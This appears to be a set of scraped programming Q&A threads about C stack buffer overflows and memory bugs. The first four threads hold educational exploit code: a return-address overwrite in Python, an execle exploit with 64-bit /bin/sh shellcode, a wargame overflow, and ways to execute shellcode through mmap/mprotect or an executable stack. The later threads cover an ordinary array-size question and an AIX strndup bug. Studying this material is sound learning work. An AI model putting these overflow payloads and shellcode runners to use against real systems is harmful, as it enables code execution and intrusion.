For educational purposes I'm trying to accomplish a bufferoverflow that directs the program to a different adress.
This is the c-program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void secret1(void) {
puts("You found the secret function No. 1!\n");
}
int main () {
char string[2];
puts("Input: ");
scanf("%s", string);
printf("You entered %s.\n", string);
return 0;
}
I used gdb to find the address of secret1 as well es the offset the my variable string to the RIP. Using this information I created the following python-exploit:
import struct
rip = 0x0000000100000e40
print("A"*24 + struct.pack("<q", rip))
So far everything works - the program jumps to secret1 and then crashes with "Segmentation fault".
HOWEVER, if I extend my program like this:
...
void secret1(void) {
puts("You found the secret function No. 1!\n");
}
void secret2(void) {
puts("You found the secret function No. 2!\n");
}
void secret3(void) {
puts("You found the secret function No. 3!\n");
}
...
...it SegFaults WITHOUT jumping to any of the functions, even tho the new fake RIPs are correct (i.e. 0x0000000100000d6c for secret1, 0x0000000100000d7e for secret2). The offsets stay the same as far as gdb told me (or don't they?).
I noticed that none of my attempts work when the program is "big enough" to place the secret-functions in the memory-area ending with 0x100000 d .. - it works like a charm tho, when they are somewhere in 0x100000 e ..
It also works with more than one secret function when I compile it in 32-Bit-mode (addresses changed accordingly) but not in 64-Bit-mode.
-fno-stack-protector // doesn't make any difference.
Can anybody please explain this odd behaviour to me? Thank you soooo much!
Perhaps creating multiple hidden functions puts them all in a page of memory without execute permission... try explicitly giving RWX permission to that page using mprotect. Could be a number of other things, but this is the first issue I would address.
As for the -fno-stack-protector gcc option, I was convinced for a while this was obfuscated on gcc 4.2.1. But after playing with it a bit more, I have learned that in order for canary stack protection to be enabled, sizeof(buffer) >= 8 must be true. Additionally, it must be a char buffer, unless you specify the -fstack-protector-all or -fnostack-protector-all options, which enable canaries even for functions that don't contain char buffers. I'm running OS X 10.6.5 64-bit with aforementioned gcc version and on a buffer overflow exploit snippet I'm writing, my stack changes when compiling with -fstack-protector-all versus compiling with no relevant options (probably because the function being exploited doesn't have a char buffer). So if you want to be certain that this feature is either disabled or enabled, make sure to use the -all variants of the options.
Related
I am reading the book "Hacking: The art of exploitation" and I have some problems with the code of exploit_notesearch_env.c It is attempting to do a buffer overflow exploit by calling the program to be exploited with the execle() function. That way the only environment variable of the program to be exploited will be the shellcode.
My problem is that I can't figure the address of the shellcode environment variable out. The book says that the base address was 0xbffffffa and then subtracts the size of the shellcode and the length of the program name from it to obtain the shellcode address.
This is the code of exploit_notesearch_env.c which calls the notesearch program:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
char shellcode[]=
"SHELLCODE=\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05";
int main(int argc, char *argv[]) {
char *env[2] = {shellcode, (char *) 0};
uint64_t i, ret;
char *buffer = (char *) malloc(160);
ret = 0xbffffffa - (sizeof(shellcode)-1) - strlen("./notesearch");
memset(buffer, '\x90', 120);
*((uint64_t *)(buffer+120)) = ret;
execle("./notesearch", "notesearch", buffer, (char *) 0, env);
free(buffer);
}
By the way the book uses a 32 bit Linux distro while I am using Kali Linux 2019.4 64 bit version which might be the origin of the problem.
The shellcode is already adjusted for 64 bits and the program correctly overflows the buffer, but with the wrong address.
Does anyone know the right substitute for the address 0xbffffffa from the book?
What is the base address of a c program environment from the execle command?
Impossible to say.
Does anyone know the right substitute for the address 0xbffffffa from the book?
No, nobody knows except your operating system.
First of all, on modern Linux systems, Address Space Layout Randomization (ASLR) is usually enabled by default. This means that every program you run will have different randomized base addresses for the stack, the heap, the binary itself and any other library or virtual memory page.
This randomization is done by the kernel itself. In order to disable ASLR, you can start the program under GDB (which disables it for you only for the started process), or you can temporarily disable it system-wide with the sysctl command, setting kernel.randomize_va_space to 0 for no ASLR and to 2 for normal ASLR.
sudo sysctl -w kernel.randomize_va_space=0 # disabled
sudo sysctl -w kernel.randomize_va_space=2 # enabled
However, even after disabling ASLR, it's still not possible to know the position of the stack beforehand, you will have to run your program under GDB at least once to check the address first (environment variables are at the bottom of the stack). There really is no other way, other than writing your own linker script, which is not that simple.
If your book did not cover these concepts before, then I strongly suggest you to find another book, because jumping right to the code without explaining anything first doesn't make much sense.
This is the C code that I am compiling:
#include <stdio.h>
#include <stdlib.h>
int main(){
long val=0x41414141;
char buf[20];
printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
printf("Here is your chance: ");
scanf("%24s",&buf);
printf("buf: %s\n",buf);
printf("val: 0x%08x\n",val);
if(val==0xdeadbeef)
system("/bin/sh");
else {
printf("WAY OFF!!!!\n");
exit(1);
}
return 0;
}
Here, I am expecting an overflow in long val if user inputs string 24 character long, changing the value in val. But it just doesn't get overflowed even if string is long enough. Can someone please explain this behaviour?
I am on macOS. This is what gcc -v spits out:
Configured with: --prefix=/Applications/Xcode.app/Contents/Developer/usr --with-gxx-include-dir=/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.12.sdk/usr/include/c++/4.2.1
Apple LLVM version 8.0.0 (clang-800.0.42.1)
Target: x86_64-apple-darwin16.0.0
Thread model: posix
InstalledDir: /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin
Also, after googling a bit I tried gcc with these flags:
gcc -g -fno-stack-protector -D_FORTIFY_SOURCE=0 -o overflow_example overflow_example.c
still, the result is same.
This code is part of narnia wargame challenge on overthewire. I managed to crack this challenge on their remote shell, where it was behaving as expected. Now, I am trying to reproduce this same challenge on my local system and facing this issue. Please help.
EDIT: For all the people yelling out about UB: like I said, this was one of the challenge to be solved on overthewire, so it cannot have UB. There are some blogs (here's on I found) that provide walkthrough for this challenge with reasonable logical explanation for why the code behaves the way it does, with which I agree. I also understand that the compiled binary is platform dependent. So, what am I to do to produce this binary with potential overflow on my local system?
It's undefined behavior because C functions do not check whether an argument is too big for its buffer or not.
Apparantly the variables get laid out differently on the stack on your mac.
Wrapping them in a struct will ensure that they are placed in the order you want.
Since there is the possibility of padding, let's turn it off. For gcc, the precompiler directe #pragma pack controls struct packing.
int main(){
#pragma pack(1)
struct {
char buf[20];
long val=0x41414141;
} s;
#pragma pack()
printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
printf("Here is your chance: ");
scanf("%24s",&s.buf);
printf("buf: %s\n",s.buf);
printf("val: 0x%08x\n",s.val);
if(s.val==0xdeadbeef)
system("/bin/sh");
else {
printf("WAY OFF!!!!\n");
exit(1);
}
return 0;
}
I'm not sure what you mean.
1) Are you concerned that your input string will create a number that will be too big to store in a long. This will not happen the number will simply wrap round.
2) Are you concerned that you'll read to memory beyond the bounds of buf? In C this will produce undefined behavior not necessarily a crash.
buf is on the stack (could be just as well on the heap) so you can just keep writing to memory from the address where buf starts. The compiler will generate code that will not do a bounds check for you. So if you go beyond the 20byte you'll eventually start overwriting other parts of memory that do not belong block of memory you've set aside for buf.
I have downloaded and compiled Apples source and added it to Xcode.app/Contents/Developer/usr/bin/include/c++/v1. Now how do I go about implementing in C? The code I am working with is from this post about Hackadays shellcode executer. My code is currently like so:
#include <stdio.h>
#include <stdlib.h>
unsigned char shellcode[] = "\x31\xFA......";
int main()
{
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shellcode;
printf("2\n");
}
I have compiled with both:
gcc -fno-stack-protector shell.c
clang -fno-stack-protector shell.c
I guess my final question is, how do I tell the compiler to implement "__enable_execute_stack"?
The stack protector is different from an executable stack. That introduces canaries to detect when the stack has been corrupted.
To get an executable stack, you have to link saying to use an executable stack. It goes without saying that this is a bad idea as it makes attacks easier.
The option for the linker is -allow_stack_execute, which turns into the gcc/clang command line:
clang -Wl,-allow_stack_execute -fno-stack-protector shell.c
your code, however, does not try to execute code on the stack, but it does attempt to change a small amount of the stack content, trying to accomplish a return to the shellcode, which is one of the most common ROP attacks.
On a typically compiled OSX 32bit environment this would be attempting to overwrite what is called the linkage area (this is the address of the next instruction that will be called upon function return). This assumes that the code was not compiled with -fomit-frame-pointer. If it's compiled with this option, then you're actually moving one extra address up.
On OSX 64bit it uses the 64bit ABI, the registers are 64bit, and all the values would need to be referenced by long rather than by int, however the manner is similar.
The shellcode you've got there, though, is actually in the data segment of your code (because it's a char [] it means that it's readable/writable, not readable-executable. You would need to either mmap it (like nneonneo's answer) or copy it into the now-executable stack, get it's address and call it that way.
However, if you're just trying to get code to run, then nneonneo's answer makes it pretty easy, but if you're trying to experiment with exploit-y code, then you're going to have to do a little more work. Because of the non-executable stack, the new kids use return-to-library mechanisms, trying to get the return to call, say, one of the exec/system calls with data from the stack.
With modern execution protections in place, it's a bit tricky to get shellcode to run like this. Note that your code is not attempting to execute code on the stack; rather, it is storing the address of the shellcode on the stack, and the actual code is in the program's data segment.
You've got a couple options to make it work:
Put the shellcode in an actual executable section, so it is executable code. You can do this with __attribute__((section("name"))) with GCC and Clang. On OS X:
const char code[] __attribute__((section("__TEXT,__text"))) = "...";
followed by a
((void (*)(void))code)();
works great. On Linux, use the section name ".text" instead.
Use mmap to create a read-write section of memory, copy your shellcode, then mprotect it so it has read-execute permissions, then execute it. This is how modern JITs execute dynamically-generated code. An example:
#include <sys/mman.h>
void execute_code(const void *code, size_t codesize) {
size_t pagesize = (codesize + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1);
void *chunk = mmap(NULL, pagesize, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0);
if(chunk == MAP_FAILED) return;
memcpy(chunk, code, codesize);
mprotect(chunk, pagesize, PROT_READ|PROT_EXEC);
((void (*)(void)chunk)();
munmap(chunk, pagesize);
}
Neither of these methods requires you to specify any special compiler flags to work properly, and neither of them require fiddling with the saved EIP on the stack.
I have a program problem for which I would like to declare a 256x256 array in C. Unfortunately, I each time I try to even declare an array of that size (integers) and I run my program, it terminates unexpectedly. Any suggestions? I haven't tried memory allocation since I cannot seem to understand how it works with multi-dimensional arrays (feel free to guide me through it though I am new to C). Another interesting thing to note is that I can declare a 248x248 array in C without any problems, but no larger.
dims = 256;
int majormatrix[dims][dims];
Compiled with:
gcc -msse2 -O3 -march=pentium4 -malign-double -funroll-loops -pipe -fomit-frame-pointer -W -Wall -o "SkyFall.exe" "SkyFall.c"
I am using SciTE 323 (not sure how to check GCC version).
There are three places where you can allocate an array in C:
In the automatic memory (commonly referred to as "on the stack")
In the dynamic memory (malloc/free), or
In the static memory (static keyword / global space).
Only the automatic memory has somewhat severe constraints on the amount of allocation (that is, in addition to the limits set by the operating system); dynamic and static allocations could potentially grab nearly as much space as is made available to your process by the operating system.
The simplest way to see if this is the case is to move the declaration outside your function. This would move your array to static memory. If crashes continue, they have nothing to do with the size of your array.
Unless you're running a very old machine/compiler, there's no reason that should be too large. It seems to me the problem is elsewhere. Try the following code and tell me if it works:
#include <stdio.h>
int main()
{
int ints[256][256], i, j;
i = j = 0;
while (i<256) {
while (j<256) {
ints[i][j] = i*j;
j++;
}
i++;
j = 0;
}
printf("Made it :) \n");
return 0;
}
You can't necessarily assume that "terminates unexpectedly" is necessarily directly because of "declaring a 256x256 array".
SUGGESTION:
1) Boil your code down to a simple, standalone example
2) Run it in the debugger
3) When it "terminates unexpectedly", use the debugger to get a "stack traceback" - you must identify the specific line that's failing
4) You should also look for a specific error message (if possible)
5) Post your code, the error message and your traceback
6) Be sure to tell us what platform (e.g. Centos Linux 5.5) and compiler (e.g. gcc 4.2.1) you're using, too.
I have seen a strange behavior with "strndup" call on AIX 5.3 and 6.1.
If I call strndup with size more than the size of actual source string length, then there is a stack corruption after that call.
Following is the sample code where this issue can come:
int main ()
{
char *dst_str = NULL;
char src_str[1023] = "sample string";
dst_str = strndup(src_str, sizeof(src_str));
free(dst_str);
return 0;
}
Does anybody have experienced this behavior?
If yes please let me know.
As per my observation, there must be a patch from OS where this issue got fixed. but i could not get that patch if at all there is any. Please throw some light.
Thanks & Regards,
Thumbeti
You are missing a #include <string.h> in your code. Please try that—I am fairly sure it will work. The reason is that without the #include <string.h>, there is no prototype for strndup() in scope, so the compiler assumes that strndup() returns an int, and takes an unspecified number of parameters. That is obviously wrong. (I am assuming you're compiling in POSIX compliant mode, so strndup() is available to you.)
For this reason, it is always useful to compile code with warnings enabled.
If your problem persists even after the change, there might be a bug.
Edit: Looks like there might be a problem with strndup() on AIX: the problem seems to be in a broken strnlen() function on AIX. If, even after #include <string.h> you see the problem, it is likely you're seeing the bug. A google search shows a long list of results about it.
Edit 2:
Can you please try the following program and post the results?
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
int main(void)
{
char *test1 = "abcdefghijabcdefghijabcdefghijk";
char *test2 = "012345678901234567890123456789";
char *control = "01234567890123456789012345678";
char *verify;
free(strndup(test1, 30));
verify = strndup(test2, 29); /* shorter then first strndup !!! */
fprintf(stderr,">%s<\n",verify);
if (strcmp(control, verify))
printf("strndup is broken\n");
}
(Taken from https://bugzilla.samba.org/show_bug.cgi?id=1097#c10.)
Edit 3: After seeing your output, which is >01234567890123456789012345678<, and with no strndup is broken, I don't think your version of AIX has the strndup bug.
Most likely you are corrupting memory somewhere (given the fact that the problem only appears in a large program, under certain conditions). Can you make a small, complete, compilable example that exhibits the stack corruption problem? Otherwise, you will have to debug your memory allocation/deallocation in your program. There are many programs to help you do that, such as valgrind, glibc mcheck, dmalloc, electricfence, etc.
Old topic, but I have experienced this issue as well. A simple test program on AIX 6.1, in conjunction with AIX's MALLOCDEBUG confirms the issue.
#include <string.h>
int main(void)
{
char test[32] = "1234";
char *newbuf = NULL;
newbuf = strndup(test, sizeof(test)-1);
}
Compile and run the program with buffer overflow detection:
~$ gcc -g test_strndup2.c
~$ MALLOCDEBUG=catch_overflow ./a.out
Segmentation fault (core dumped)
Now run dbx to analyze the core:
~$ dbx ./a.out /var/Corefiles/core.6225952.22190412
Type 'help' for help.
[using memory image in /var/Corefiles/core.6225952.22190412]
reading symbolic information ...
Segmentation fault in strncpy at 0xd0139efc
0xd0139efc (strncpy+0xdc) 9cc50001 stbu r6,0x1(r5)
(dbx) where
strncpy() at 0xd0139efc
strndup#AF5_3(??, ??) at 0xd03f3f34
main(), line 8 in "test_strndup2.c"
Tracing through the instructions in strndup, it appears that it mallocs a buffer that is just large enough to handle the string in s plus a NULL terminator. However, it will always copy n characters to the new buffer, padding with zeros if necessary, causing a buffer overflow if strlen(s) < n.
char* strndup(const char*s, size_t n)
{
char* newbuf = (char*)malloc(strnlen(s, n) + 1);
strncpy(newbuf, s, n-1);
return newbuf;
}
Alok is right. and with the gcc toolchain under glibc, you would need to define _GNU_SOURCE to get the decl of strndup, otherwise it's not decl'd, e.g.:
#include <string.h>
...
compilo:
gcc -D_GNU_SOURCE a.c
Thanks a lot for your prompt responses.
I have tried the given program.
following is the result:
bash-2.05b# ./mystrndup3
>01234567890123456789012345678<
In my program I have included , still problem is persistent.
Following is the strndup declaration in prepossessed code.
extern char * strndup(const char *, size_t);
I would like to clarify one thing, with small program I don't get effect of stack corruption. It is consistently appearing in my product which has huge amount of function calls.
Using strndup in the following way solved the problem:
dst_str = strndup(src_str, srtlen(src_str));
Please note: used strlen instead of sizeof as i need only the valid string.
I am trying to understand why it is happening.
Behavior i am seeing with my product when i use strndup with large size:
At the "exit" of main, execution is coring with "illegal instruction"
intermittently "Illegal Instruction" in the middle of execution (after strndup call).
Corrupt of some allocated memory, which is no where related to strndup.
All these issues are resolved by just modifying the usage of strndup with actual size of source string.
Thanks & Regards,
Thumbeti